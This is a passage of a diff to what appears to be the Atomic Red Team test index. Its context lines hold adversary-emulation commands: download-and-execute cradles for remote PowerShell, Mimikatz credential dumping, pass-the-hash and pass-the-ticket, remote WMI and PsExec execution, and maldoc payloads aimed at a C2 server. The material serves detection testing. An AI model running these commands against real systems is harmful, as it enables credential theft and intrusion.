get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -67958,13 +67958,13 @@ execution:
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
-'
+ '
name: powershell
- name: OSTap Payload Download
auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80
description: 'Uses cscript //E:jscript to download a file
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -67982,7 +67982,7 @@ execution:
cscript //E:Jscript #{script_file}
cleanup_command: 'del #{script_file} /F /Q >nul 2>&1
-'
+ '
name: command_prompt
- name: Maldoc choice flags command execution
auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18
@@ -68000,7 +68000,7 @@ execution:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -68011,7 +68011,7 @@ execution:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -68039,7 +68039,7 @@ execution:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -68050,7 +68050,7 @@ execution:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -68077,7 +68077,7 @@ execution:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -68088,7 +68088,7 @@ execution:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -68120,7 +68120,7 @@ execution:
dependencies:
- description: 'Microsoft Excel must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "Excel.Application" | Out-Null
@@ -68130,7 +68130,7 @@ execution:
get_prereq_command: 'Write-Host "You will need to install Microsoft Excel
manually to meet this requirement"
-'
+ '
executor:
command: |
$fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"
@@ -68202,7 +68202,7 @@ execution:
dependencies:
- description: 'Microsoft Word must be installed
-'
+ '
prereq_command: |
try {
$wdApp = New-Object -COMObject "Word.Application"
@@ -68211,10 +68211,10 @@ execution:
get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
to meet this requirement"
-'
+ '
- description: 'Google Chrome must be installed
-'
+ '
prereq_command: |
try {
$chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName
@@ -68223,7 +68223,7 @@ execution:
get_prereq_command: 'Write-Host "You will need to install Google Chrome manually
to meet this requirement"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -68232,7 +68232,7 @@ execution:
name: powershell
cleanup_command: 'Stop-Process -name mshta
-'
+ '
- name: Potentially Unwanted Applications (PUA)
auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295
description: 'The Potentially Unwanted Applications (PUA) protection feature
@@ -68244,7 +68244,7 @@ execution:
instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify
anti-pua protection).
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -68279,14 +68279,14 @@ execution:
macro_path:
description: 'Location of file which will be converted to a VBA macro
-'
+ '
type: Path
default: PathToAtomicsFolder/T1204.002/src/test9-GenericPayloadDownload.txt
c2_domain:
description: 'This required variable points to a user defined HTTP server
that will host the file_name in the c2_parent_directory.
-'
+ '
type: Url
default:
c2_parent_directory:
@@ -68305,7 +68305,7 @@ execution:
ms_product:
description: 'Maldoc application Word or Excel
-'
+ '
type: String
default: Word
dependency_executor_name: powershell
@@ -68313,17 +68313,17 @@ execution:
- description: 'Destination c2_domain name or IP address must be set to a running
HTTP server.
-'
+ '
prereq_command: 'if (#{c2_domain}) (exit 0) else (exit 1)
-'
+ '
get_prereq_command: 'Write-Host "Destination c2 server domain name or IP address
must be set and reachable for HTTP service"
-'
+ '
- description: 'Microsoftt #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -68334,7 +68334,7 @@ execution:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
name: powershell
command: |
@@ -68347,7 +68347,7 @@ execution:
cleanup_command: 'Remove-Item "C:\Users\$env:username\Desktop\#{file_name}"
-ErrorAction Ignore
-'
+ '
T1204.003:
technique:
object_marking_refs:
@@ -68708,7 +68708,7 @@ execution:
description: 'Download Mimikatz and dump credentials. Upon execution, mimikatz
dump details and password hashes will be displayed.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -68720,7 +68720,7 @@ execution:
command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{mimurl}'');
Invoke-Mimikatz -DumpCreds"
-'
+ '
name: command_prompt
elevation_required: true
- name: Run BloodHound from local disk
@@ -68740,15 +68740,15 @@ execution:
dependencies:
- description: 'SharpHound.ps1 must be located at #{file_path}
-'
+ '
prereq_command: 'if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else
{exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1"
-OutFile "#{file_path}\SharpHound.ps1"
-'
+ '
executor:
command: |
write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
@@ -68757,7 +68757,7 @@ execution:
Start-Sleep 5
cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force
-'
+ '
name: powershell
- name: Run Bloodhound from Memory using Download Cradle
auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7
@@ -68775,7 +68775,7 @@ execution:
Start-Sleep 5
cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force
-'
+ '
name: powershell
- name: Obfuscation Tests
auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804
@@ -68783,7 +68783,7 @@ execution:
out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM
REMOTE LOCATION"
-'
+ '
supported_platforms:
- windows
executor:
@@ -68798,7 +68798,7 @@ execution:
will take place to open file explorer, open notepad and input code, then mimikatz
dump info will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -68829,7 +68829,7 @@ execution:
command: 'Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'');
Invoke-AppPathBypass -Payload ''C:\Windows\System32\cmd.exe''"
-'
+ '
name: command_prompt
- name: Powershell MsXml COM object - with prompt
auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da
@@ -68849,7 +68849,7 @@ execution:
MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX
$comMsXml.ResponseText"
-'
+ '
name: command_prompt
- name: Powershell XML requests
auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6
@@ -68869,7 +68869,7 @@ execution:
bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load(''#{url}'');$Xml.command.a.execute
| IEX"
-'
+ '
name: command_prompt
- name: Powershell invoke mshta.exe download
auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af
@@ -68887,7 +68887,7 @@ execution:
executor:
command: 'C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject(''script:#{url}'').Exec();close()"
-'
+ '
name: command_prompt
- name: Powershell Invoke-DownloadCradle
auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7
@@ -68929,26 +68929,26 @@ execution:
dependencies:
- description: 'PowerShell version 2 must be installed
-'
+ '
prereq_command: 'if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit
0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Automated installer not implemented yet,
please install PowerShell v2 manually
-'
+ '
executor:
command: 'powershell.exe -version 2 -Command Write-Host $PSVersion
-'
+ '
name: powershell
- name: NTFS Alternate Data Stream Access
auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680
description: 'Creates a file with an alternate data stream and simulates executing
that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -68959,14 +68959,14 @@ execution:
dependencies:
- description: 'Homedrive must be an NTFS drive
-'
+ '
prereq_command: 'if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem
-contains "NTFS") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Prereq''s for this test cannot be met automatically
-'
+ '
executor:
name: powershell
command: |
@@ -68975,7 +68975,7 @@ execution:
Invoke-Expression $streamcommand
cleanup_command: 'Remove-Item #{ads_file} -Force -ErrorAction Ignore
-'
+ '
- name: PowerShell Session Creation and Use
auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd
description: |
@@ -68992,12 +68992,12 @@ execution:
dependencies:
- description: 'PSRemoting must be enabled
-'
+ '
prereq_command: "Try {\n New-PSSession -ComputerName #{hostname_to_connect}
-ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n"
get_prereq_command: 'Enable-PSRemoting
-'
+ '
executor:
name: powershell
elevation_required: true
@@ -69031,7 +69031,7 @@ execution:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type}
-CommandParamVariation #{command_param_variation} -Execute -ErrorAction
@@ -69067,7 +69067,7 @@ execution:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type}
-CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation
@@ -69098,7 +69098,7 @@ execution:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type}
-EncodedCommandParamVariation #{encoded_command_param_variation} -Execute
@@ -69134,7 +69134,7 @@ execution:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type}
-EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments
@@ -69147,7 +69147,7 @@ execution:
outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection
Report by Red Canary.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -69158,7 +69158,7 @@ execution:
executor:
command: 'powershell.exe -e #{obfuscated_code}
-'
+ '
name: command_prompt
- name: PowerShell Invoke Known Malicious Cmdlets
auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3
@@ -69180,7 +69180,7 @@ execution:
"PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy",
"Set-CriticalProcess", "Set-MasterBootRecord"
-'
+ '
executor:
name: powershell
elevation_required: true
@@ -69194,7 +69194,7 @@ execution:
auto_generated_guid: 1289f78d-22d2-4590-ac76-166737e1811b
description: 'Check for privilege escalation paths using PowerUp from PowerShellMafia
-'
+ '
supported_platforms:
- windows
executor:
@@ -69280,7 +69280,7 @@ execution:
$which_python -c 'import requests' 2>/dev/null; echo $?
get_prereq_command: 'pip install requests
-'
+ '
executor:
command: |
which_python=$(which python || which python3 || which python2)
@@ -69320,7 +69320,7 @@ execution:
dependencies:
- description: 'Requires Python
-'
+ '
prereq_command: |
which_python=$(which python || which python3 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
@@ -69347,7 +69347,7 @@ execution:
an external malicious script then executes locally using the supplied executor
and arguments
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -69381,7 +69381,7 @@ execution:
dependencies:
- description: 'Requires Python
-'
+ '
prereq_command: |
which_python=$(which python || which python3 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
@@ -69404,7 +69404,7 @@ execution:
name: sh
cleanup_command: 'rm #{python_binary_name} #{python_script_name} #{payload_file_name}
-'
+ '
T1053.005:
technique:
type: attack-pattern
@@ -69502,7 +69502,7 @@ execution:
description: 'Upon successful execution, cmd.exe will create a scheduled task
to spawn cmd.exe at 20:10.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -69519,10 +69519,10 @@ execution:
elevation_required: false
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
-'
+ '
cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1
-'
+ '
- name: Scheduled task Remote
auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
description: |
@@ -69558,11 +69558,11 @@ execution:
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
-'
+ '
cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password}
/TN "Atomic task" /F >nul 2>&1
-'
+ '
- name: Powershell Cmdlet Scheduled Task
auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
description: |
@@ -69584,7 +69584,7 @@ execution:
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
>$null 2>&1
-'
+ '
- name: Task Scheduler via VBA
auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
description: |
@@ -69601,7 +69601,7 @@ execution:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -69612,7 +69612,7 @@ execution:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -69625,7 +69625,7 @@ execution:
login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing
as Register-ScheduledTask cmdlet behind the scenes.
-'
+ '
supported_platforms:
- windows
executor:
@@ -69637,7 +69637,7 @@ execution:
cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false
>$null 2>&1
-'
+ '
- name: Scheduled Task Executing Base64 Encoded Commands From Registry
auto_generated_guid: e895677d-4f06-49ab-91b6-ae3742d0a2ba
description: "A Base64 Encoded command will be stored in the registry (ping
@@ -69873,7 +69873,7 @@ execution:
sc.exe delete #{service_name}
cleanup_command: 'del C:\art-marker.txt >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Use PsExec to execute a command on a remote host
@@ -69907,10 +69907,10 @@ execution:
- description: 'PsExec tool from Sysinternals must exist on disk at specified
location (#{psexec_exe})
-'
+ '
prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
@@ -69920,14 +69920,14 @@ execution:
command: '#{psexec_exe} \\#{remote_host} -u #{user_name} -p #{password} -accepteula
"C:\Windows\System32\calc.exe"
-'
+ '
name: command_prompt
- name: psexec.py (Impacket)
auto_generated_guid: edbcd8c9-3639-4844-afad-455c91e95a35
description: 'Will execute a command on the remote host with Impacket psexec.py
script.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -69955,18 +69955,18 @@ execution:
dependencies:
- description: 'psexec.py (Impacket)
-'
+ '
prereq_command: 'if [ -x "$(command -v psexec.py)" ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'sudo pip3 install impacket
-'
+ '
executor:
command: 'psexec.py ''#{domain}/#{username}:#{password}@#{remote_host}'' ''#{command}''
-'
+ '
name: bash
T1129:
technique:
@@ -70099,7 +70099,7 @@ execution:
description: 'An adversary may use Radmin Viewer Utility to remotely control
Windows device, this will start the radmin console.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -70115,10 +70115,10 @@ execution:
- description: 'Radmin Viewer Utility must be installed at specified location
(#{radmin_exe})
-'
+ '
prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1)
-'
+ '
get_prereq_command: |
echo Downloading radmin installer
bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
@@ -70348,20 +70348,20 @@ execution:
dependencies:
- description: 'Check if systemd-run exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else
exit 1; fi;
-'
+ '
get_prereq_command: 'echo "Install systemd on the machine."; exit 1;
-'
+ '
executor:
elevation_required: false
command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1''
/bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log''
-'
+ '
cleanup_command: |
systemctl --user stop Atomic-Red-Team.service
systemctl --user stop Atomic-Red-Team.timer
@@ -70378,20 +70378,20 @@ execution:
dependencies:
- description: 'Check if systemd-run exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else
exit 1; fi;
-'
+ '
get_prereq_command: 'echo "Install systemd on the machine."; exit 1;
-'
+ '
executor:
elevation_required: true
command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh
-c ''echo "$(date) $(whoami)" >>/tmp/log''
-'
+ '
cleanup_command: |
systemctl stop Atomic-Red-Team.service
systemctl stop Atomic-Red-Team.timer
@@ -70459,7 +70459,7 @@ execution:
auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
description: 'Creates and executes a simple bash script.
-'
+ '
supported_platforms:
- macos
- linux
@@ -70476,7 +70476,7 @@ execution:
sh #{script_path}
cleanup_command: 'rm #{script_path}
-'
+ '
name: sh
- name: Command-Line Interface
auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
@@ -70493,7 +70493,7 @@ execution:
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
cleanup_command: 'rm /tmp/art-fish.txt
-'
+ '
name: sh
- name: Harvest SUID executable files
auto_generated_guid: 46274fc6-08a7-4956-861b-24cbbaa0503c
@@ -70515,13 +70515,13 @@ execution:
dependencies:
- description: 'AutoSUID must exist on disk at specified location (#{autosuid})
-'
+ '
prereq_command: 'if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: 'curl #{autosuid_url} --output #{autosuid}
-'
+ '
executor:
command: |
chmod +x #{autosuid}
@@ -70534,7 +70534,7 @@ execution:
from these commands to present operator with ways of escalating privileges
or further exploitation of targeted host.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -70550,13 +70550,13 @@ execution:
dependencies:
- description: 'LinnEnum must exist on disk at specified location (#{linenum})
-'
+ '
prereq_command: 'if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: 'curl #{linenum_url} --output #{linenum}
-'
+ '
executor:
command: |
chmod +x #{linenum}
@@ -70714,7 +70714,7 @@ execution:
dependencies:
- description: 'The 64-bit version of Microsoft Office must be installed
-'
+ '
prereq_command: |
try {
$wdApp = New-Object -COMObject "Word.Application"
@@ -70725,7 +70725,7 @@ execution:
get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit)
manually to meet this requirement"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -70734,7 +70734,7 @@ execution:
cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine
-like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
-'
+ '
name: powershell
- name: Extract Memory via VBA
auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6
@@ -70753,7 +70753,7 @@ execution:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -70764,7 +70764,7 @@ execution:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -70773,7 +70773,7 @@ execution:
cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin"
-ErrorAction Ignore
-'
+ '
name: powershell
T1059.003:
technique:
@@ -70823,7 +70823,7 @@ execution:
description: 'Creates and executes a simple batch script. Upon execution, CMD
will briefly launch to run the batch script then close again.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -70839,27 +70839,27 @@ execution:
dependencies:
- description: 'Batch file must exist on disk at specified location (#{script_path})
-'
+ '
prereq_command: 'if (Test-Path #{script_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item #{script_path} -Force | Out-Null
Set-Content -Path #{script_path} -Value "#{command_to_execute}"
executor:
command: 'Start-Process #{script_path}
-'
+ '
cleanup_command: 'Remove-Item #{script_path} -Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Writes text to a file and displays it.
auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e
description: 'Writes text to a file and display the results. This test is intended
to emulate the dropping of a malicious file to disk.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -70874,17 +70874,17 @@ execution:
executor:
command: 'echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}"
-'
+ '
cleanup_command: 'del "#{file_contents_path}" >nul 2>&1
-'
+ '
name: command_prompt
- name: Suspicious Execution via Windows Command Shell
auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20
description: 'Command line executed via suspicious invocation. Example is from
the 2021 Threat Detection Report by Red Canary.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -70922,22 +70922,22 @@ execution:
dependencies:
- description: 'File to print must exist on disk at specified location (#{file_to_print})
-'
+ '
prereq_command: 'if (test-path "#{file_to_print}"){exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'new-item #{file_to_print} -value "This file has been
created by T1059.003 Test 4" -Force | Out-Null
-'
+ '
executor:
command: 'cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe
/p #{file_to_print}" | out-null
-'
+ '
cleanup_command: 'stop-process -name wordpad -force -erroraction silentlycontinue
-'
+ '
name: powershell
T1047:
technique:
@@ -71003,7 +71003,7 @@ execution:
executor:
command: 'wmic useraccount get /ALL /format:csv
-'
+ '
name: command_prompt
- name: WMI Reconnaissance Processes
auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2
@@ -71015,7 +71015,7 @@ execution:
executor:
command: 'wmic process get caption,executablepath,commandline /format:csv
-'
+ '
name: command_prompt
- name: WMI Reconnaissance Software
auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414
@@ -71027,7 +71027,7 @@ execution:
executor:
command: 'wmic qfe get description,installedOn /format:csv
-'
+ '
name: command_prompt
- name: WMI Reconnaissance List Remote Services
auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3
@@ -71051,7 +71051,7 @@ execution:
executor:
command: 'wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
-'
+ '
name: command_prompt
- name: WMI Execute Local Process
auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3
@@ -71068,11 +71068,11 @@ execution:
executor:
command: 'wmic process call create #{process_to_execute}
-'
+ '
cleanup_command: 'wmic process where name=''#{process_to_execute}'' delete
>nul 2>&1
-'
+ '
name: command_prompt
- name: WMI Execute Remote Process
auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b
@@ -71103,11 +71103,11 @@ execution:
command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process
call create #{process_to_execute}
-'
+ '
cleanup_command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}"
process where name=''#{process_to_execute}'' delete >nul 2>&1
-'
+ '
name: command_prompt
- name: Create a Process using WMI Query and an Encoded Command
auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c
@@ -71124,7 +71124,7 @@ execution:
executor:
command: 'powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA
-'
+ '
name: command_prompt
- name: Create a Process using obfuscated Win32_Process
auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43
@@ -71158,7 +71158,7 @@ execution:
description: 'This test uses wmic.exe to execute a DLL function using rundll32.
Specify a valid value for remote IP using the node parameter.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -71182,12 +71182,12 @@ execution:
get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true"
-OutFile "#{dll_to_execute}"
-'
+ '
executor:
command: 'wmic /node:#{node} process call create "rundll32.exe #{dll_to_execute}
#{function_to_execute}"
-'
+ '
cleanup_command: taskkill /f /im calculator.exe
name: powershell
- name: Application uninstall using WMIC
@@ -71514,7 +71514,7 @@ lateral-movement:
command: '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
$null, $null, "7")
-'
+ '
name: powershell
T1210:
technique:
@@ -71769,7 +71769,7 @@ lateral-movement:
- description: 'Mimikatz executor must exist on disk and at specified location
(#{mimikatz_path})
-'
+ '
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -71784,13 +71784,13 @@ lateral-movement:
command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain}
/ntlm:#{ntlm}"
-'
+ '
name: command_prompt
- name: crackmapexec Pass the Hash
auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9
description: 'command execute with crackmapexec
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -71819,14 +71819,14 @@ lateral-movement:
- description: 'CrackMapExec executor must exist on disk at specified location
(#{crackmapexec_exe})
-'
+ '
prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Automated installer not implemented yet, please
install crackmapexec manually at this location: #{crackmapexec_exe}
-'
+ '
executor:
command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n"
name: command_prompt
@@ -71907,7 +71907,7 @@ lateral-movement:
auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098
description: 'Similar to PTH, but attacking Kerberos
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -71924,10 +71924,10 @@ lateral-movement:
dependencies:
- description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe})
-'
+ '
prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
@@ -71938,7 +71938,7 @@ lateral-movement:
executor:
command: '#{mimikatz_exe} "kerberos::ptt #{ticket}"
-'
+ '
name: command_prompt
- name: Rubeus Kerberos Pass The Ticket
auto_generated_guid: a2fc4ec5-12c6-4fb4-b661-961f23f359cb
@@ -71981,19 +71981,19 @@ lateral-movement:
dependencies:
- description: 'Rubeus must exist on disk at specified location (#{rubeus_path})
-'
+ '
prereq_command: 'if (Test-Path #{rubeus_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path}
-'
+ '
- description: 'PsExec must exist on disk at specified location (#{psexec_path})
-'
+ '
prereq_command: 'if (Test-Path #{psexec_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
